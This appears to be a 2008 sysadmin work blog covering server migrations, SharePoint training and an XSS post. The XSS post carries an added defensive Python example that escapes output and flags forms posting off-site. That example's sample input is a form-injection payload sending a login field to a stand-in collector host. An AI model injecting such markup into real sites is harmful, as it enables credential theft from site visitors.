January MAR

Peter Woods | AppHosting | Tuesday, January 29th, 2008

Nagios/Fruity Migration: Hosts and services are being manually imported with the new Fruity tool.

ITS Website Migration: The server has been built in the .1 network for development and testing, and user accounts have been created for the vendor. Training has also been scheduled.

Mailgate Migration: My involvement here has been very minimal this month since the mailgates have been moved behind the CSM. My activities here have been primarily housekeeping and documentation.

Sitemason Migration: The Sitemason services were migrated to the new servers. The frontend web server is running in a VM, and the backend database server is running on physical hardware. The site has been running pretty well, and I have been making periodic checks at the OS layer to make sure that everything is OK. The frontend server was built with twice as much memory (4GB) as the original, and the system is using up to 95% of it at times. The system has managed to use a small bit of swap. Unfortunately, I was not able to catch what activity was occurring on the system at the time.

Sharepoint Training: I attended the introduction to Sharepoint training.

Sharepoint Service Site: I've set up another Apache virtual host on one of the existing VMs. The non-SSL site will be used as a service info and directory site, and the SSL site is intended to dress up the URL that the user sees. I'm still working on the second part of this task.

Team Voice Communication Testing: I've been lucky enough to get a Plantronics bluetooth headset to pair with my phone and my laptop.  I've even installed Live Messenger (LM) so that I can take advantage of the voice feature.  I can definitely say that I prefer Pidgin, and at some point when I get the time I'll post up a comparison.

Training Is Complete

Peter Woods | Miscellaneous | Thursday, January 24th, 2008

I wanted to hold my review of the Sharepoint class until it was complete.  Well, my 2.5 day introduction to Microsoft Sharepoint is done, and while I do appreciate the opportunity, I don't think that I learned anything new.  I suspect that the rest of the AppHosting team would agree that the class was rather elementary in scope. The exercises were rather basic, and I had encountered most of it in my normal usage of our team sites. I don't know what the instructor's background was, but he was not prepared to answer any questions that deviated beyond the labs. 

On a related note, I launched another Apache virtual host to serve as the informational and site directory page for the ITS Sharepoint service.  I'm also doing some testing on rewriting and proxying URLs to the real Sharepoint service. I've still got a bit more work to do on this part.

FIPP Website

Peter Woods | Web Services | Wednesday, January 23rd, 2008

The FIPP website is back online thanks to the folks over at Hammock Publishing.

Sharepoint Training

Peter Woods | Miscellaneous | Monday, January 21st, 2008

I'll be spending the next 2.5 days in a Sharepoint introduction class which is being taught by Quilogy. From what I can tell, the training manual has been expanded a little bit with more screenshots than the first class had. We'll see if my impression of the class matches up with what I've heard so far.

Relying On A Logo?

Peter Woods | Miscellaneous | Sunday, January 20th, 2008

I found this InformationWeek article while surfing after the Sitemason change. According to a pair of researchers, over 60 ScanAlert Hacker Safe certified sites (including one for the company itself) have been vulnerable to cross-site scripting (XSS) attacks. There were some pretty recognizable websites on the list like cafepress.com and cduniverse.com.

It's interesting to note that the director of the Hacker Safe program apparently made a statement that XSS vulnerabilities can't be used to hack the website's server.  I like this statement from him: "But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly." Unfortunately that's not entirely true.  The intent of an XSS attack is to insert HTML code into the target website to affect the user experience. Common targets are login forms and such. Anyone that submits data to an inserted or tampered form risks having their data whisked away to an unscrupulous website. While the site itself has not been harmed, the alternate path for that form data could result in some serious problems for the site user.

It looks like ScanAlert might need to update their scanning engine. Hopefully those 60 sites will get things taken care of pretty quickly. As usual the best defense for this is to know the sites that you surf.  Make sure that when you follow a link to a site that it came from a site that you are familiar with.
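The form-tampering risk described in this post, shown from the defender's side. This is an added example, not code from the original post or from ScanAlert; `render_search`, `offsite_form_actions` and the `shop.example` / `collector.example` hosts are hypothetical, and the search term is constructed sample input. It renders a reflected value with and without output encoding, then audits the resulting page for forms that submit to another origin.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def render_search(term, escape=True):
    """Reflect a user-supplied search term into a page that also holds the site's login form."""
    shown = html.escape(term, quote=True) if escape else term
    return ('<p>Results for: ' + shown + '</p>'
            '<form action="/login" method="post"><input name="user"></form>')


class _FormCollector(HTMLParser):
    """Collect the action attribute of every <form> start tag."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def offsite_form_actions(page_html, page_url):
    """Return the absolute action URL of every form that submits to a different origin."""
    collector = _FormCollector()
    collector.feed(page_html)
    collector.close()
    home = urlsplit(page_url)
    found = []
    for action in collector.actions:
        # Relative and empty actions resolve against the page URL, as a browser would.
        target = urlsplit(urljoin(page_url, action))
        if (target.scheme, target.netloc) != (home.scheme, home.netloc):
            found.append(target.geturl())
    return found


# Constructed sample input: a search term carrying markup for a form that posts elsewhere.
PAGE_URL = "https://shop.example/search"
TERM = '<form action="https://collector.example/c" method="post"><input name="user"></form>'

if __name__ == "__main__":
    print("unescaped:", offsite_form_actions(render_search(TERM, escape=False), PAGE_URL))
    print("escaped:  ", offsite_form_actions(render_search(TERM, escape=True), PAGE_URL))
```

The server and its database are untouched in both runs; only the page delivered to the visitor differs, which is why the risk falls on whoever submits the form.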

Sitemason Cutover

Peter Woods | Web Services | Sunday, January 20th, 2008

The Sitemason migration has been completed. The frontend and backend servers were migrated to new hardware: one virtual and one physical. Once again the life-cycle-replacement clock has been restarted for another service.

Live SSL

Peter Woods | Miscellaneous | Thursday, January 17th, 2008

I logged into the Windows Live site for the first time today, and I received this SSL warning from Firefox 3b2.  The cert is issued by the Microsoft Secure Server Authority, which Firefox does not know anything about. No such error on the IE side. One exception added in Firefox…

[Image: Live SSL error]

Server Updates

Peter Woods | Web Services | Tuesday, January 15th, 2008

I've got an up2date running on my development web server while I'm working on my weekly incident report.  Hopefully I finish my report before the up2date completes.

Nagios Update

Peter Woods | Projects | Thursday, January 10th, 2008

The new Nagios service is intermittently running as new hosts and services are added to the configuration. At this time, sendmail is shut down to prevent the alerts from going out. It's basically trial and error to make sure that the checks in the current environment are carried over. It's tedious work without a build document.